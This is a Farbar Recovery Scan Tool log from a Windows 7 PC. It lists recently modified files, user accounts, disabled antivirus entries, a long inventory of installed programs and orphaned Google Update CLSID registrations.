==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-18 20:47 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-11-18 20:47 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-11-18 20:41 - 2018-07-17 21:31 - 000000000 ____D C:\Users\Vladana\AppData\Local\AVAST Software
2019-11-18 20:38 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-18 19:45 - 2013-03-19 22:08 - 000746014 _____ C:\Windows\system32\perfh00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000740656 _____ C:\Windows\system32\perfh015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000714178 _____ C:\Windows\system32\prfh0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000684052 _____ C:\Windows\system32\perfh00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000607286 _____ C:\Windows\system32\perfh008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000494812 _____ C:\Windows\system32\perfh014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000479312 _____ C:\Windows\system32\perfh001.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000417076 _____ C:\Windows\system32\perfh011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000171600 _____ C:\Windows\system32\perfc00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000156198 _____ C:\Windows\system32\perfc015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000149906 _____ C:\Windows\system32\perfc00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000147982 _____ C:\Windows\system32\prfc0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000122426 _____ C:\Windows\system32\perfc011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000111454 _____ C:\Windows\system32\perfc008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095730 _____ C:\Windows\system32\perfc014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095098 _____ C:\Windows\system32\perfc001.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000481800 _____ C:\Windows\system32\perfh00B.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000101846 _____ C:\Windows\system32\perfc00B.dat
2019-11-18 19:45 - 2009-07-14 06:13 - 007211860 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-18 19:45 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2019-11-18 19:28 - 2013-02-21 15:11 - 000000000 ____D C:\Program Files (x86)\Nokia
2019-11-18 13:46 - 2017-09-05 15:33 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mp3tag
2019-11-18 02:26 - 2014-10-19 23:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\vlc
2019-11-17 22:16 - 2013-02-21 01:36 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Azureus
2019-11-17 02:16 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-11-16 17:47 - 2019-05-23 11:52 - 000003160 _____ C:\Windows\system32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389}
2019-11-16 17:47 - 2018-09-06 18:23 - 000003334 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-11-16 17:47 - 2018-09-06 18:23 - 000003206 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-11-16 17:47 - 2018-03-14 03:40 - 000004470 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2019-11-16 17:47 - 2016-03-23 08:37 - 000003052 _____ C:\Windows\system32\Tasks\SafeZone scheduled Autoupdate 1458718670
2019-11-16 17:47 - 2016-01-03 12:45 - 000003652 _____ C:\Windows\system32\Tasks\DivXUpdate
2019-11-16 17:47 - 2015-12-03 22:42 - 000000000 ____D C:\Windows\system32\Tasks\AVAST Software
2019-11-16 17:47 - 2015-06-10 12:59 - 000004458 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2019-11-16 17:47 - 2015-06-10 12:47 - 000003850 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1433936833
2019-11-16 17:47 - 2015-02-06 11:56 - 000003432 _____ C:\Windows\system32\Tasks\RealDownloader Update Check
2019-11-16 17:47 - 2015-01-06 11:27 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2019-11-16 17:47 - 2014-07-14 00:42 - 000003226 _____ C:\Windows\system32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C}
2019-11-16 17:47 - 2013-03-15 02:37 - 000003192 _____ C:\Windows\system32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85}
2019-11-16 17:47 - 2013-02-28 00:53 - 000003390 _____ C:\Windows\system32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-16 17:47 - 2013-02-21 21:07 - 000003508 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA
2019-11-16 17:47 - 2013-02-21 21:07 - 000003236 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core
2019-11-16 17:47 - 2013-02-20 22:41 - 000004312 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2019-11-16 17:46 - 2019-05-23 15:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2019-11-16 16:21 - 2013-02-20 22:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\Microsoft Help
2019-11-16 15:55 - 2014-08-18 11:50 - 000000000 ____D C:\Program Files (x86)\Freemake
2019-11-16 14:54 - 2017-07-25 15:43 - 000000000 ____D C:\Users\Vladana\AppData\Local\FreemakeVideoConverter
2019-11-16 14:54 - 2014-08-18 11:50 - 000000000 ____D C:\ProgramData\Freemake
2019-11-16 13:48 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ZenGuard GmbH
2019-11-15 19:04 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\SquirrelTemp
2019-11-15 17:02 - 2013-02-20 21:51 - 000000000 ____D C:\Users\Vladana\AppData\Local\Google
2019-11-13 21:40 - 2013-02-20 22:41 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2019-11-13 21:40 - 2013-02-20 22:41 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2019-11-13 21:40 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\system32\Macromed
2019-11-11 15:42 - 2016-09-25 12:57 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Apowersoft
2019-11-11 01:33 - 2017-03-14 00:19 - 000004168 _____ C:\Windows\system32\Tasks\Avast Emergency Update
2019-11-11 01:28 - 2013-02-20 21:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-09 12:32 - 2017-04-16 10:33 - 000000000 ____D C:\Users\Vladana\AppData\LocalLow\Mozilla
2019-11-08 01:14 - 2018-09-06 18:24 - 000002184 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2019-11-07 18:44 - 2015-06-10 12:47 - 000000000 ____D C:\Program Files (x86)\Opera
2019-11-06 11:30 - 2016-09-05 13:58 - 000001271 _____ C:\Users\Vladana\Desktop\marker.txt
2019-11-05 05:03 - 2013-02-20 21:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mozilla
2019-11-05 00:06 - 2015-10-15 21:00 - 000000000 ____D C:\Program Files (x86)\Google
2019-10-22 01:05 - 2017-09-05 14:37 - 000000000 ____D C:\Program Files (x86)\Mp3tag
 
==================== Files in the root of some directories ========
 
2013-04-12 20:07 - 2014-11-17 02:37 - 000000580 _____ () C:\Users\Vladana\AppData\Roaming\AutoGK.ini
2013-03-15 02:55 - 2014-11-18 03:36 - 000010752 _____ () C:\Users\Vladana\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-19 01:43 - 2015-05-19 01:43 - 000247298 _____ () C:\Users\Vladana\AppData\Local\Tempdivx84f8
2015-07-02 22:06 - 2015-07-02 22:06 - 000043682 _____ () C:\Users\Vladana\AppData\Local\Tempdivxffab
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
 
LastRegBack: 2019-11-17 06:56
==================== End of FRST.txt ========================
 
 
Copy of Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (18-11-2019 20:55:45)
Running from C:\Users\Vladana\Desktop
Windows 7 Ultimate (X64) (2013-02-20 19:53:32)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-7682389-3612777877-391866582-500 - Administrator - Disabled)
Guest (S-1-5-21-7682389-3612777877-391866582-501 - Limited - Disabled)
Vladana (S-1-5-21-7682389-3612777877-391866582-1000 - Administrator - Enabled) => C:\Users\Vladana
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Disabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Disabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader (HKLM-x32\...\4K Video Downloader) (Version:  - Open Media LLC)
ACDSee 10 Photo Manager (HKLM-x32\...\{F8B98EB6-FC06-45BF-87D4-9784E0408611}) (Version: 10.0.219 - ACD Systems International)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Adobe Flash Player 32 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version:  - ALPS ELECTRIC CO., LTD.)
Apowersoft Online Launcher version 1.6.1 (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{20BF67A8-D81A-4489-8225-FABAA0896E2D}_is1) (Version: 1.6.1 - APOWERSOFT LIMITED)
Auto Gordian Knot 2.55 (HKLM-x32\...\AutoGK) (Version: 2.55 - len0x)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.8.2393 - AVAST Software)
AVI ReComp 1.5.5 (HKLM-x32\...\AVI ReComp) (Version: 1.5.5 - Mateusz Gola (aka Prozac))
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Awesomium.NET Redistribution Module (HKLM-x32\...\{C34CAF35-6198-4EEB-970F-C61FC51D23BD}) (Version: 1.7.4.2 - ©2014 Awesomium Technologies LLC) Hidden
Bigasoft Total Video Converter 3.7.24.4700 (HKLM-x32\...\{a72ce741-1f32-4d79-bffb-a714375c678d}_is1) (Version:  - Bigasoft Corporation)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DivX Setup (HKLM\...\DivX Setup) (Version: 10.8.7.0 - DivX, LLC)
FileLab Plugin 1.1.33 (HKLM-x32\...\{6AC5F630-9453-433D-90FF-BB3A8E4F8960}) (Version: 1.1.33 - FileLab)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
Freemake Video Converter version 4.1.10 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.10 - Mixbyte Inc.)
Fujitsu Hotkey Utility (HKLM-x32\...\{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (HKLM\...\{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED)
Fujitsu System Extension Utility (HKLM\...\{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 78.0.3904.97 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden
Google Video Support Plugin (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 19.11.1200.0 - Google, LLC.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2696 - Intel Corporation)
Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{705EE775-5776-48FD-B704-C3C9CF535420}) (Version: 15.1.1.0170 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{F0932859-AA60-459E-B843-0BDECA34E2C7}) (Version: 2.0.0.0086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{BAA0BE9B-9E6D-4802-91CB-FB7ED5CD4BEF}) (Version: 15.01.1500.1034 - Intel Corporation)
iPool (HKLM-x32\...\iPool) (Version: 2.2.03 - Memir Games)
iSnooker 2.2.60 (HKLM-x32\...\isnooker_memir_is1) (Version: 2.2.60 - Memir Games Ltd)
Java 8 Update 221 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180221F0}) (Version: 8.0.2210.11 - Oracle Corporation)
KeepVid Pro(Build 6.3.2.0) (HKLM-x32\...\KeepVid Pro_is1) (Version: 6.3.2.0 - KeepVid Studio)
LIFEBOOK Application Panel (HKLM\...\{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
Malwarebytes version 3.4.5.2467 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.4.5.2467 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM-x32\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\SkyDriveSetup.exe) (Version: 17.0.2006.0314 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 70.0.1.7242 - Mozilla)
Mp3tag v2.99a (HKLM-x32\...\Mp3tag) (Version: 2.99a - Florian Heidenreich)
MSVC80_x64_v2 (HKLM\...\{4D668D4F-FAA2-4726-834C-31F4614F312E}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC80_x86_v2 (HKLM-x32\...\{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC90_x64 (HKLM\...\{AB071C8B-873C-459F-ACA9-9EBE03C3E89B}) (Version: 1.0.1.2 - Nokia) Hidden
MSVC90_x86 (HKLM-x32\...\{AF111648-99A1-453E-81DD-80DBBF6DAD0D}) (Version: 1.0.1.2 - Nokia) Hidden
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{B94515E1-2DD6-11E2-849E-F04DA23A5C58}) (Version: 2.0.515 - Sony)
Nokia Connectivity Cable Driver (HKLM-x32\...\{29373274-977E-413C-A4DE-DC0F8E80C429}) (Version: 7.1.172.0 - Nokia)
Nokia Software Updater (HKLM-x32\...\{7130468A-F53F-4698-8C09-A339EA3B05E6}) (Version: 3.0.655 - Nokia)
Nokia Suite (HKLM-x32\...\{88B6F9DE-C80F-4A70-ACF6-BEE933679170}) (Version: 3.8.54.0 - Nokia) Hidden
Nokia Suite (HKLM-x32\...\Nokia Suite) (Version: 3.8.54.0 - Nokia)
Opera Stable 64.0.3417.92 (HKLM-x32\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software)
PC Connectivity Solution (HKLM-x32\...\{6D01D1B1-17BD-4F10-BB11-F08F0C47D42B}) (Version: 12.0.109.0 - Nokia)
PeaZip 5.2.0 (HKLM-x32\...\{5A2BC38A-406C-4A5B-BF45-6991F9A05325}_is1) (Version:  - Giorgio Tani)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (HKLM\...\{E1C056BE-ACC9-4FCF-B37D-55A46648B369}) (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.043 - FUJITSU LIMITED)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RealDownloader (HKLM-x32\...\{6FCD4D5A-20B9-4D79-ABA5-4E7048944025}) (Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (HKLM-x32\...\{e6171278-8759-449d-9e0b-c1825debc2ad}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealDownloader (HKLM-x32\...\{FBEFDC9E-F8FB-4B66-A78B-09B7B380D59D}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (HKLM-x32\...\{7770E71B-2D43-4800-9CB3-5B6CAAEBEBEA}) (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM\...\{21E47F47-C9A7-4454-BA48-388327B0EA00}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM-x32\...\{AAECF7BA-E83B-4A10-87EA-DE0B333F8734}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.53.216.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (HKLM-x32\...\{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}) (Version: 1.1.0 - RealNetworks, Inc.) Hidden
SafeZone Stable 1.48.2066.44 (HKLM-x32\...\SafeZone 1.48.2066.44) (Version: 1.48.2066.44 - Avast Software) Hidden
SolveigMM AVI Trimmer (HKLM-x32\...\SolveigMM AVI Trimmer 2.0.1210.11) (Version: 2.0.1210.11 - Solveig Multimedia)
Sound Forge Pro 10.0 (HKLM-x32\...\{8EF5E2B0-2DD1-11E2-89A5-F04DA23A5C58}) (Version: 10.0.507 - Sony)
Spotify (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Spotify) (Version: 1.1.8.439.g8502297d - Spotify AB)
Subtitle Edit 3.4.3 (HKLM-x32\...\SubtitleEdit_is1) (Version: 3.4.3.0 - Nikse)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version:  - )
Unity Web Player (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
UpdateService (HKLM-x32\...\{E3AE96D6-E196-45B4-AF62-2B41998B9E37}) (Version: 1.0.0 - RealNetworks, Inc.) Hidden
VC80CRTRedist - 8.0.50727.6195 (HKLM-x32\...\{933B4015-4618-4716-A828-5289FC03165F}) (Version: 1.2.0 - DivX, Inc) Hidden
VCRedistSetup (HKLM-x32\...\{3921A67A-5AB1-4E48-9444-C71814CF3027}) (Version: 1.0.0 - Nero AG) Hidden
Video Download Capture version 6.2.8 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.8 - APOWERSOFT LIMITED)
Video Downloader (HKLM-x32\...\{62796191-6F12-4ABE-BA8B-B4D4A266C997}) (Version: 1.0.0 - RealNetworks) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VobSub v2.23 (Remove Only) (HKLM-x32\...\VobSub) (Version:  - )
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 5.7.6.0 - Azureus Software, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.623  - Nullsoft, Inc)
Winamp Detector Plug-in (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Windows Driver Package - Nokia pccsmcfd LegacyDriver  (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Wondershare Filmora(Build 8.5.3) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.5.2 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.2 - Wondershare)
XviD MPEG4 Video Codec (remove only) (HKLM-x32\...\XviD MPEG4 Video Codec) (Version:  - )
ZD Soft Screen Recorder 11.2.0 (HKLM-x32\...\{05289906-8CDE-44FD-9FA5-95866BF511A9}) (Version: 11.2.0.0 - ZD Soft)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
